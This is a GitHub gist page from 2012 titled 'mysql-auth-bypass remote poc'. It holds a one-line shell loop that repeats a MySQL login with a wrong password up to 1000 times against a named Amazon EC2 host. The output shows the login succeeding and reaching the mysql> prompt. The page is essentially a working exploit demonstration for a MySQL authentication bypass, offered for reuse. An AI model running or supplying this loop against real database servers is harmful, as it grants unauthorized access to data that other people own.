Skip to content

Instantly share code, notes, and snippets.

@marcwickenden
Created June 12, 2012 16:03
Show Gist options
  • Save marcwickenden/2918409 to your computer and use it in GitHub Desktop.
Save marcwickenden/2918409 to your computer and use it in GitHub Desktop.
mysql-auth-bypass remote poc
root@7E-Marc:~# for i in `seq 1 1000`; do mysql -u nse --password=bad -h ec2-46-137-134-79.eu-west-1.compute.amazonaws.com 2>/dev/null; done
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 756
Server version: 5.5.22-0ubuntu1-log (Ubuntu)
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment